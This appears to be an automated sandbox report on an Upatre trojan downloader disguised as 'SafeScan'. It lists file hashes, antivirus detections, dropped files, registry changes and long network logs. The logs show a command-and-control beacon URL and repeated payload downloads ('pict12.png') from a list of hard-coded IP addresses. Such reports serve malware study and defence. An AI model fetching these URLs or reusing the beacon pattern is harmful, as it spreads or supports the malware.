Analysis Date: 2015-12-05 15:57:58
MD5: a98e80bc628530f1e55aca175fec85e2
SHA1: 23911d32edcd86f26471fa63d874ddc86d11b412

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 338b28f6491de57e43e54d029062a328 sha1: 02dd861ddd6c0023cbdc588e62a0456009b8eadb size: 48128
Section .rdata: md5: 8f04549995ca607f0fe9133713caddda sha1: 1f13d939113181c9694b3700b4673e926ac6dd2e size: 31744
Section .data: md5: 3ea6f7b141f1573448b51afed5e92880 sha1: 67cf7fac5617fb79cf0da683afc182f974b02188 size: 7168
Section .rsrc: md5: 737e636a64cf5c569b3169cce59a28ae sha1: f899dc6e9d6eacafe704540310ad2ea6f25f7963 size: 23552
Timestamp: 2014-07-18 19:29:01
Version:
  LegalCopyright:
  InternalName:
  FileVersion: 2.3.0.91
  CompanyName: Safe-soft
  LegalTrademarks:
  ProductName: SafeScan
  ProductVersion: 3.91
  FileDescription:
  OriginalFilename:
Packer: VC8 -> Microsoft Corporation
PEhash: 3ae867e4b4bd1d7707f3a598c2f5e7cce352e348
IMPhash: fb205081ca935568918c6c78c3c5e54a
AV Kaspersky: Trojan-Downloader.Win32.Upatre.chbm
AV Rising: Trojan.Win32.Kryptik.ae
AV F-Secure: Trojan.Upatre.Gen.3
AV Microsoft Security Essentials: TrojanDownloader:Win32/Upatre
AV MicroWorld (escan): Trojan.Upatre.Gen.3
AV Fortinet: W32/Generic.AC.1792298
AV Frisk (f-prot): W32/Upatre.DM.gen!Eldorado
AV Ikarus: Trojan-Downloader.Win32.Waski
AV K7: Trojan ( 004c75411 )
AV Mcafee: Upatre-FACH!A98E80BC6285
AV Eset (nod32): Win32/Kryptik.DNJD
AV Grisoft (avg): Generic_s.EVP
AV MalwareBytes: Trojan.Upatre
AV Ad-Aware: Trojan.Upatre.Gen.3
AV BullGuard: Trojan.Upatre.Gen.3
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Authentium: W32/Upatre.DM.gen!Eldorado
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): TrojanDwnLdr.Upatre.A3
AV Avira (antivir): TR/Crypt.ZPACK.64254
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader14.46865
AV Arcabit (arcavir): Trojan.Upatre.Gen.3
AV BitDefender: Trojan.Upatre.Gen.3
AV Emsisoft: Trojan.Upatre.Gen.3

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\yaxkodila.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\yaxkodila.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\yaxkodila.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\icanhazip[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: 72.230.82.80
Winsock DNS: 93.93.194.202
Winsock DNS: 188.255.165.154
Winsock DNS: 173.248.29.43
Winsock DNS: 64.203.121.6
Winsock DNS: 109.86.226.85
Winsock DNS: 176.36.251.208
Winsock DNS: icanhazip.com
Winsock DNS: 188.255.169.176
Winsock DNS: 104.174.123.66
Winsock DNS: 173.216.240.56
Winsock DNS: 69.163.81.211
Winsock DNS: 216.254.231.11
Winsock DNS: 24.220.92.193
Winsock DNS: 68.190.246.142
Winsock DNS: 75.137.112.81
Winsock DNS: 24.33.131.116

Network Details:

DNS: icanhazip.com (Type: A) ➝ 64.182.208.185
DNS: icanhazip.com (Type: A) ➝ 64.182.208.184
HTTP User-Agent (identical for every request listed below): Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GET: http://icanhazip.com/
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/0/51-SP3/0/
HTTP GET: http://176.36.251.208:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/4/
HTTP GET: http://188.255.165.154:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/5/
HTTP GET: http://173.216.240.56:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/6/
HTTP GET: http://68.190.246.142:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/7/
HTTP GET: http://188.255.169.176:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/8/
HTTP GET: http://75.137.112.81:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/9/
HTTP GET: http://69.163.81.211:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
HTTP GET: http://216.254.231.11:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
HTTP GET: http://24.33.131.116:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
HTTP GET: http://104.174.123.66:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
HTTP GET: http://72.230.82.80:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
HTTP GET: http://64.203.121.6:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
HTTP GET: http://173.248.29.43:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
HTTP GET: http://109.86.226.85:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/2/
HTTP GET: http://24.220.92.193:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/3/
HTTP GET: http://176.36.251.208:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/4/
HTTP GET: http://188.255.165.154:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/5/
HTTP GET: http://173.216.240.56:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/6/
HTTP GET: http://68.190.246.142:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/7/
HTTP GET: http://188.255.169.176:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/8/
HTTP GET: http://75.137.112.81:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/9/
HTTP GET: http://69.163.81.211:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
HTTP GET: http://216.254.231.11:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
HTTP GET: http://24.33.131.116:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
HTTP GET: http://104.174.123.66:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
HTTP GET: http://72.230.82.80:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
HTTP GET: http://64.203.121.6:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
HTTP GET: http://173.248.29.43:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
HTTP GET: http://109.86.226.85:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/2/
HTTP GET: http://24.220.92.193:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/3/
HTTP GET: http://176.36.251.208:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/4/
HTTP GET: http://188.255.165.154:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/5/
HTTP GET: http://173.216.240.56:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/6/
HTTP GET: http://68.190.246.142:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/7/
HTTP GET: http://188.255.169.176:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/8/
HTTP GET: http://75.137.112.81:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/9/
HTTP GET: http://69.163.81.211:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
HTTP GET: http://216.254.231.11:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
HTTP GET: http://24.33.131.116:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
HTTP GET: http://104.174.123.66:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
HTTP GET: http://72.230.82.80:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
HTTP GET: http://64.203.121.6:198/pict12.png
HTTP GET: http://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
Flows TCP: 192.168.1.1:1031 ➝ 64.182.208.185:80
Flows TCP: 192.168.1.1:1032 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1033 ➝ 176.36.251.208:198
Flows TCP: 192.168.1.1:1034 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1035 ➝ 188.255.165.154:198
Flows TCP: 192.168.1.1:1036 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1037 ➝ 173.216.240.56:198
Flows TCP: 192.168.1.1:1038 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1039 ➝ 68.190.246.142:198
Flows TCP: 192.168.1.1:1040 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1041 ➝ 188.255.169.176:198
Flows TCP: 192.168.1.1:1042 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1043 ➝ 75.137.112.81:198
Flows TCP: 192.168.1.1:1044 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1045 ➝ 69.163.81.211:198
Flows TCP: 192.168.1.1:1046 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1047 ➝ 216.254.231.11:198
Flows TCP: 192.168.1.1:1048 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1049 ➝ 24.33.131.116:198
Flows TCP: 192.168.1.1:1050 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1051 ➝ 104.174.123.66:198
Flows TCP: 192.168.1.1:1052 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1053 ➝ 72.230.82.80:198
Flows TCP: 192.168.1.1:1054 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1055 ➝ 64.203.121.6:198
Flows TCP: 192.168.1.1:1056 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1057 ➝ 173.248.29.43:198
Flows TCP: 192.168.1.1:1058 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1059 ➝ 109.86.226.85:198
Flows TCP: 192.168.1.1:1060 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1061 ➝ 24.220.92.193:198
Flows TCP: 192.168.1.1:1062 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1063 ➝ 176.36.251.208:198
Flows TCP: 192.168.1.1:1064 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1065 ➝ 188.255.165.154:198
Flows TCP: 192.168.1.1:1066 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1067 ➝ 173.216.240.56:198
Flows TCP: 192.168.1.1:1068 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1069 ➝ 68.190.246.142:198
Flows TCP: 192.168.1.1:1070 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1071 ➝ 188.255.169.176:198
Flows TCP: 192.168.1.1:1072 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1073 ➝ 75.137.112.81:198
Flows TCP: 192.168.1.1:1074 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1075 ➝ 69.163.81.211:198
Flows TCP: 192.168.1.1:1076 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1077 ➝ 216.254.231.11:198
Flows TCP: 192.168.1.1:1078 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1079 ➝ 24.33.131.116:198
Flows TCP: 192.168.1.1:1080 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1081 ➝ 104.174.123.66:198
Flows TCP: 192.168.1.1:1082 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1083 ➝ 72.230.82.80:198
Flows TCP: 192.168.1.1:1084 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1085 ➝ 64.203.121.6:198
Flows TCP: 192.168.1.1:1086 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1087 ➝ 173.248.29.43:198
Flows TCP: 192.168.1.1:1088 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1089 ➝ 109.86.226.85:198
Flows TCP: 192.168.1.1:1090 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1091 ➝ 24.220.92.193:198
Flows TCP: 192.168.1.1:1092 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1093 ➝ 176.36.251.208:198
Flows TCP: 192.168.1.1:1094 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1095 ➝ 188.255.165.154:198
Flows TCP: 192.168.1.1:1096 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1097 ➝ 173.216.240.56:198
Flows TCP: 192.168.1.1:1098 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1099 ➝ 68.190.246.142:198
Flows TCP: 192.168.1.1:1100 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1101 ➝ 188.255.169.176:198
Flows TCP: 192.168.1.1:1102 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1103 ➝ 75.137.112.81:198
Flows TCP: 192.168.1.1:1104 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1105 ➝ 69.163.81.211:198
Flows TCP: 192.168.1.1:1106 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1107 ➝ 216.254.231.11:198
Flows TCP: 192.168.1.1:1108 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1109 ➝ 24.33.131.116:198
Flows TCP: 192.168.1.1:1110 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1111 ➝ 104.174.123.66:198
Flows TCP: 192.168.1.1:1112 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1113 ➝ 72.230.82.80:198
Flows TCP: 192.168.1.1:1114 ➝ 93.93.194.202:13241
Flows TCP: 192.168.1.1:1115 ➝ 64.203.121.6:198
Flows TCP: 192.168.1.1:1116 ➝ 93.93.194.202:13241